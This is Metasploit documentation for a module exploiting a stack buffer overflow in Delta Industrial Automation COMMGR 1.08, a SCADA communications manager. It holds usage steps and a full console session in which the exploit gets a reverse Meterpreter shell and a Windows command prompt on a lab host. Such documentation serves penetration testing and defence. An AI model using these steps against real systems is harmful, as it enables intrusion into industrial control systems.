adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
94de45d856b7d4ea32456bbdc7531af67bfbcaa1
metasploit-gs/documentation/modules/exploit/windows/scada/delta_ia_commgr_bof.md
T

2.3 KiB
Raw Blame History

Vulnerable Application

Delta Electronics Delta Industrial Automation COMMGR 1.08 is affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code. This module has been tested successfully on Windows XP SP3, Windows 7 SP1, and Windows 8.1. The vulnerable application is available for download at http://www.deltaww.com/Products/PluginWebUserControl/downloadCenterCounter.aspx?DID=7763&DocPath=1&hl=en-US.

Verification Steps

  1. Install Delta Industrial Automation COMMGR 1.08
  2. Start msfconsole
  3. Do use exploit/windows/scada/delta_ia_commgr_bof
  4. Do set RHOST <target_ip>
  5. Do run
  6. You should get a shell. :)

Scenarios

Delta Industrial Automation COMMGR 1.08 on Windows 7 SP1

msf > use exploit/windows/scada/delta_ia_commgr_bof
msf exploit(windows/scada/delta_ia_commgr_bof) > show options

Module options (exploit/windows/scada/delta_ia_commgr_bof):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  502              yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   COMMGR 1.08 / Windows Universal


msf exploit(windows/scada/delta_ia_commgr_bof) > set RHOST 192.168.3.64
RHOST => 192.168.3.64
msf exploit(windows/scada/delta_ia_commgr_bof) > run

[*] Started reverse TCP handler on 192.168.3.150:4444
[*] 192.168.3.64:502 - Trying target COMMGR 1.08 / Windows Universal, sending 4601 bytes...
[*] Sending stage (179779 bytes) to 192.168.3.64
[*] Meterpreter session 1 opened (192.168.3.150:4444 -> 192.168.3.64:49170) at 2018-09-18 23:38:51 -0700

meterpreter > sysinfo
Computer        : TEST01
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > shell
Process 932 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Program Files (x86)\Delta Industrial Automation\COMMGR 1.08>exit
exit
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.3.64 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(windows/scada/delta_ia_commgr_bof) >
Reference in New Issue View Git Blame Copy Permalink